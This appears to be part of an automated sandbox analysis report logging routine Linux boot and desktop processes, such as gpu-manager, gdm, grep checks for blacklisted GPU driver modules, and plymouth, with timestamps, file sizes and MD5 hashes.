              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              File Activities

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/grep
              Arguments:grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              File size:199136 bytes
              MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

              File Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              File Activities

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/grep
              Arguments:grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              File size:199136 bytes
              MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

              File Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              File Activities

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/grep
              Arguments:grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              File size:199136 bytes
              MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

              File Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              File Activities

              Process Activities


              General

              Start time (UTC):18:48:40
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Process Activities


              General

              Start time (UTC):18:48:40
              Start date (UTC):02/04/2025
              Path:/usr/bin/grep
              Arguments:grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              File size:199136 bytes
              MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

              File Activities


              General

              Start time (UTC):18:48:40
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Process Activities


              General

              Start time (UTC):18:48:40
              Start date (UTC):02/04/2025
              Path:/usr/share/gdm/generate-config
              Arguments:/usr/share/gdm/generate-config
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              File Activities

              Process Activities


              General

              Start time (UTC):18:48:40
              Start date (UTC):02/04/2025
              Path:/usr/share/gdm/generate-config
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Process Activities


              General

              Start time (UTC):18:48:40
              Start date (UTC):02/04/2025
              Path:/usr/bin/pkill
              Arguments:pkill --signal HUP --uid gdm dconf-service
              File size:30968 bytes
              MD5 hash:fa96a75a08109d8842e4865b2907d51f

              File Activities

              Network Activities


              General

              Start time (UTC):18:48:41
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Process Activities


              General

              Start time (UTC):18:48:41
              Start date (UTC):02/04/2025
              Path:/usr/lib/gdm3/gdm-wait-for-drm
              Arguments:/usr/lib/gdm3/gdm-wait-for-drm
              File size:14640 bytes
              MD5 hash:82043ba752c6930b4e6aaea2f7747545

              File Activities


              General

              Start time (UTC):18:48:52
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Process Activities


              General

              Start time (UTC):18:48:52
              Start date (UTC):02/04/2025
              Path:/usr/sbin/gdm3
              Arguments:/usr/sbin/gdm3
              File size:453296 bytes
              MD5 hash:2492e2d8d34f9377e3e530a61a15674f

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:52
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:52
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:52
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:52
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:48:52
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:49:12
              Start date (UTC):02/04/2025
              Path:/usr/libexec/gvfsd-fuse
              Arguments:-
              File size:47632 bytes
              MD5 hash:d18fbf1cbf8eb57b17fac48b7b4be933

              Process Activities


              General

              Start time (UTC):18:49:12
              Start date (UTC):02/04/2025
              Path:/bin/fusermount
              Arguments:fusermount -u -q -z -- /run/user/1000/gvfs
              File size:39144 bytes
              MD5 hash:576a1b135c82bdcbc97a91acea900566

              File Activities

              Network Activities


              General

              Start time (UTC):18:49:36
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Process Activities


              General

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              File Activities

              Process Activities

              System Activities


              General

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:49:38
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Process Activities


              General

              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              File Activities

              Process Activities

              System Activities


              General

              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:40
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:49:41
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Process Activities


              General

              Start time (UTC):18:49:41
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              File Activities

              Process Activities

              System Activities


              General

              Start time (UTC):18:49:41
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:41
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:41
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:41
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:41
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:41
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:41
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:41
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:41
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:49:42
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Process Activities


              General

              Start time (UTC):18:49:42
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              File Activities

              Process Activities

              System Activities


              General

              Start time (UTC):18:49:42
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:42
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:42
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:42
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:42
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:42
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:42
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:42
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:43
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:49:44
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Process Activities


              General

              Start time (UTC):18:49:44
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              File Activities

              Process Activities

              System Activities


              General

              Start time (UTC):18:49:44
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:44
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:44
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:44
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:44
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:44
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:44
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:44
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Process Activities


              General

              Start time (UTC):18:49:45
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              File Activities

              Process Activities

              Network Activities


              General

              Start time (UTC):18:49:46
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Process Activities


              General

              Start time (UTC):18:49:46
              Start date (UTC):02/04/2025
              Path:/bin/plymouth
              Arguments:/bin/plymouth quit
              File size:51352 bytes
              MD5 hash:87003efd8dad470042f5e75360a8f49f

              File Activities

              Network Activities